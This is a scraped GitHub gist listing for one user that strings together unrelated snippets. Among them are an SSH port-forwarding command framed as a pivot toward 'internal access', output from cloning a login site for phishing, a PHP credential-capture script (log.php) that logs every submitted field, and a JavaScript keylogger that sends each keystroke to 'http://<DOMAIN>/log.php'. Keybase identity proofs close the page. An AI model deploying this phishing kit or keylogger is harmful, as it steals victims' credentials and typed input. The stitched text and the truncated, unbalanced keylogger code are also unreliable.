Skip to content

Instantly share code, notes, and snippets.

Command to run:
ssh -L 2222:localhost:8501 user@remoteserver.com
where 2222 is the local port mapping it can be any number above 1000
where localhost must be set to localhost and refers to your current connection
where 8501 is the port you will be opening up on the remote machine
where user@remoteserver.com is the first hop in your quest for internal access
# python clonesite.py "http://www.safelogin.co" "safelogin" log.php
CLONING URL [http://www.safelogin.co]
FOUND A NEW LINK [http://yui.yahooapis.com/3.2.0/build/cssreset/reset-min.css]
FOUND A NEW LINK * [http://yui.yahooapis.com/3.2.0/build/cssreset/reset-min.css]
BAD URL [http://yui.yahooapis.com/3.2.0/build/cssreset/reset-min.css]
FOUND A NEW LINK [http://www.safelogin.co/css/bootstrap.css]
FOUND A NEW LINK * [/css/bootstrap.css]
CLONING URL [http://www.safelogin.co/css/bootstrap.css]
FOUND A NEW LINK [http://www.safelogin.co/img/glyphicons-halflings.png]
FOUND A NEW LINK * [/img/glyphicons-halflings.png]
@tatanus
tatanus / log.php
Last active August 29, 2015 14:17
<?php
$file = 'LOG.txt';
$arr= $_REQUEST;
$fp = fopen($file, 'a');
foreach ($arr as $key => $value) {
$toFile = "Key: $key; Value: $value \n";
fwrite($fp, "$toFile");
}
fclose($fp);
?>
window.onload = function load(){
if (window.addEventListener) {
document.addEventListener('keypress', p, true);
document.addEventListener('keydown', d, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', p);
document.attachEvent('onkeydown', d);
} else {
document.onkeypress = p;
document.onkeydown = d;
document.onkeypress = function(e) {
k = (window.event) ? window.event.keyCode : e.which;
k = String.fromCharCode(k);
new Image().src = 'http://<DOMAIN>/log.php?c=' + k;
}

Keybase proof

I hereby claim:

  • I am tatanus on github.
  • I am adamcompton (https://keybase.io/adamcompton) on keybase.
  • I have a public key whose fingerprint is 7A71 DF0B F490 5F4F EF95 AEB3 D32B 2743 762D 5196

To claim this, I am signing this object:

### Keybase proof
I hereby claim:
* I am tatanus on github.
* I am adamcompton (https://keybase.io/adamcompton) on keybase.
* I have a public key whose fingerprint is 3313 225D 8EA8 0018 1623 3E9A 60DB 8BD4 1C7A 960B
To claim this, I am signing this object:
Verifying myself: My Bitcoin username is +tatanus. https://onename.io/tatanus